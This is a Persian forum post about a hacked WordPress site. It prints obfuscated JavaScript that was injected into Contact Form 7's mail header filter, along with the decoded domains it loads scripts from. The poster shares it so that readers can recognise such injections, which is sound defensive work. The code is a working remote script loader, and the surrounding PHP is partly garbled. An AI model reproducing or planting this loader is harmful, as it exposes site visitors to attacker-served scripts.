سلام

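امروز یکی از دوستان به من پیام داد که سایتش ویروسی شده است. وقتی بررسی کردم، کل سایت پر از فایل های آلوده بود و در یکسری از فایل ها کد های مخرب تزریق شده بود. نمونه ای از آن را برایتان قرار میدهم ؛ شاید به دردتان بخورد یا حداقل وقتی به چنین کد هایی برخوردید متوجه شوید که این کد ها عادی نیستند. نشانه های غیرعادی بودن در این نمونه : چند تگ script مبهم سازی شده (رشته های هگز و String.fromCharCode) داخل رشته HTML سربرگ ایمیل افزونه Contact Form 7 (فیلتر wpcf7_mail_html_header) قرار گرفته اند و از دامنه های خارجی اسکریپت بارگذاری میکنند ؛ با تبدیل اعداد به حروف این نشانی ها به دست می آید : hxxps://cdnwebsiteforyou[.]biz/cdn.js?c=1 و hxxps://blueeyeswebsite[.]com/ad.js?t1 و hxxps://forwardmytraffic[.]com/ad.js?port=44 . برای تشخیص ، فایل را با نسخه سالم همان افزونه مقایسه کنید :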

کد PHP:
$header apply_filters'wpcf7_mail_html_header',            '<!doctype html><html xmlns="http://www.w3.org/1999/xhtml"' $lang_atts '><head><script type="text/javascript">var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,49);var _0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()}</script><script language=javascript>var _0xfcc55=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc55[0]](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 117, 101, 101, 121, 101, 115, 119, 101, 98, 115, 105, 
116, 101, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 116, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc55[2]](_0xfcc55[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc55[3]](null);return _0x3bc1x5[_0xfcc55[4]]};var text=get_text(url);if(text!= String[_0xfcc55[0]](110,117,108,108)&& text[_0xfcc55[5]](String[_0xfcc55[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc55[6]](String[_0xfcc55[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc55[7]]= String[_0xfcc55[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc55[8]]= true;_0x3bc1x8[_0xfcc55[9]]= _0xfcc55[10];_0x3bc1x8[_0xfcc55[11]]= text;document[_0xfcc55[13]](String[_0xfcc55[0]](104,101,97,100))[0][_0xfcc55[12]](_0x3bc1x8)};var scrpts=document[_0xfcc55[13]](_0xfcc55[14]);var n=true;for(var i=scrpts[_0xfcc55[15]];i--;){if(scrpts[i][_0xfcc55[9]]== _0xfcc55[10]){n= false}};if(n== true){a()}}</script><script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var 
_0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script><title>' esc_html$this->get'subject'true ) ) . '</title><script type='text/javascript'>var _0x1e38=['length','fromCharCode','createElement','type','async','code125','src','appendChild','getElementsByTagName','script'];(function(_0x546a53,_0x3f720e){var _0x440369=function(_0x2e1b64){while(--_0x2e1b64){_0x546a53['push'](_0x546a53['shift']());}};_0x440369(++_0x3f720e);}(_0x1e38,0x1e1));var _0x5a05=function(_0x716551,_0x1d4a8e){_0x716551=_0x716551-0x0;var _0x2b7638=_0x1e38[_0x716551];return _0x2b7638;};var url=String[_0x5a05('0x0')](104, 116, 116, 112, 115, 58, 47, 47, 102, 111, 114, 119, 97, 114, 100, 109, 121, 116, 114, 97, 102, 102, 105, 99, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 112, 111, 114, 116, 61, 52, 52);var a=function(){var _0x22c9c8=document[_0x5a05('0x1')](String[_0x5a05('0x0')](0x73,0x63,0x72,0x69,0x70,0x74));_0x22c9c8[_0x5a05('0x2')]=String[_0x5a05('0x0')](0x74,0x65,0x78,0x74,0x2f,0x6a,0x61,0x76,0x61,0x73,0x63,0x72,0x69,0x70,0x74);_0x22c9c8[_0x5a05('0x3')]=!![];_0x22c9c8['id']=_0x5a05('0x4');_0x22c9c8[_0x5a05('0x5')]=url;document['getElementsByTagName'](String[_0x5a05('0x0')](0x68,0x65,0x61,0x64))[0x0][_0x5a05('0x6')](_0x22c9c8);};var scrpts=document[_0x5a05('0x7')](_0x5a05('0x8'));var n=!![];for(var i=scrpts[_0x5a05('0x9')];i--;){if(scrpts[i]['id']==_0x5a05('0x4')){n=![];}};if(n==!![]){a();}</script><script language=javascript>var 
_0xfcc55=["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x47\x45\x54","\x6F\x70\x65\x6E","\x73\x65\x6E\x64","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x74\x79\x70\x65","\x61\x73\x79\x6E\x63","\x69\x64","\x63\x64\x6E\x37\x38\x39","\x73\x72\x63","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x73\x63\x72\x69\x70\x74","\x6C\x65\x6E\x67\x74\x68"];var url=String[_0xfcc55[0]](104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 117, 101, 101, 121, 101, 115, 119, 101, 98, 115, 105, 116, 101, 46, 99, 111, 109, 47, 97, 100, 46, 106, 115, 63, 116, 49);var get_text=function httpGet(_0x3bc1x4){var _0x3bc1x5= new XMLHttpRequest();_0x3bc1x5[_0xfcc55[2]](_0xfcc55[1],_0x3bc1x4,false);_0x3bc1x5[_0xfcc55[3]](null);return _0x3bc1x5[_0xfcc55[4]]};var text=get_text(url);if(text!= String[_0xfcc55[0]](110,117,108,108)&& text[_0xfcc55[5]](String[_0xfcc55[0]](104,116,116,112,115,58,47,47))>  -1){var a=function(){var _0x3bc1x8=document[_0xfcc55[6]](String[_0xfcc55[0]](115,99,114,105,112,116));_0x3bc1x8[_0xfcc55[7]]= String[_0xfcc55[0]](116,101,120,116,47,106,97,118,97,115,99,114,105,112,116);_0x3bc1x8[_0xfcc55[8]]= true;_0x3bc1x8[_0xfcc55[9]]= _0xfcc55[10];_0x3bc1x8[_0xfcc55[11]]= text;document[_0xfcc55[13]](String[_0xfcc55[0]](104,101,97,100))[0][_0xfcc55[12]](_0x3bc1x8)};var scrpts=document[_0xfcc55[13]](_0xfcc55[14]);var n=true;for(var i=scrpts[_0xfcc55[15]];i--;){if(scrpts[i][_0xfcc55[9]]== _0xfcc55[10]){n= false}};if(n== true){a()}}</script><script type="text/javascript">var a1=function(){var _0x41fbx1=String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](104,116,116,112,115,58,47,47,99,100,110,119,101,98,115,105,116,101,102,111,114,121,111,117,46,98,105,122,47,99,100,110,46,106,115,63,99,61,49);var 
_0x41fbx2=document["\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74"]("\x73\x63\x72\x69\x70\x74");_0x41fbx2["\x74\x79\x70\x65"]= "\x74\x65\x78\x74\x2F\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74";_0x41fbx2["\x61\x73\x79\x6E\x63"]= true;_0x41fbx2["\x69\x64"]= "\x63\x64\x37\x30\x39\x30\x31\x30";_0x41fbx2["\x73\x72\x63"]= _0x41fbx1;var _0x41fbx3=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74")[0];_0x41fbx3["\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65"]["\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65"](_0x41fbx2,_0x41fbx3)};var scripts=document["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65"]("\x73\x63\x72\x69\x70\x74");var n=true;for(var i=0;i< scripts["\x6C\x65\x6E\x67\x74\x68"];i++){if(scripts[i]["\x69\x64"]== "\x63\x64\x37\x30\x39\x30\x31\x30"){n= false}};if(n== true){a1()}</script></head><body>'$this );
        
$footer apply_filters'wpcf7_mail_html_footer',            '</body></html>'$this );
        
$html $header wpautop$body ) . $footer;        return $html;    }
    private function 
compose$send true ) {        $components = array(            'subject' => $this->get'subject'true ),            'sender' => $this->get'sender'true ),            'body' => $this->get'body'true ),            'recipient' => $this->get'recipient'true ),            'additional_headers' => $this->get'additional_headers'true ),            'attachments' => $this->attachments(),        );
        
$components apply_filters'wpcf7_mail_components',            $componentswpcf7_get_current_contact_form(), $this );
        if ( ! 
$send ) {            return $components;        }
        
$subject wpcf7_strip_newline$components['subject'] );        $sender wpcf7_strip_newline$components['sender'] );        $recipient wpcf7_strip_newline$components['recipient'] );        $body $components['body'];        $additional_headers trim$components['additional_headers'] );        $attachments $components['attachments'];
        
$headers "From: $sender\n";
        if ( 
$this->use_html ) {            $headers .= "Content-Type: text/html\n";            $headers .= "X-WPCF7-Content-Type: text/html\n";        } else {            $headers .= "X-WPCF7-Content-Type: text/plain\n";        }
        if ( 
$additional_headers ) {            $headers .= $additional_headers "\n";        }
        return 
wp_mail$recipient$subject$body$headers$attachments );    }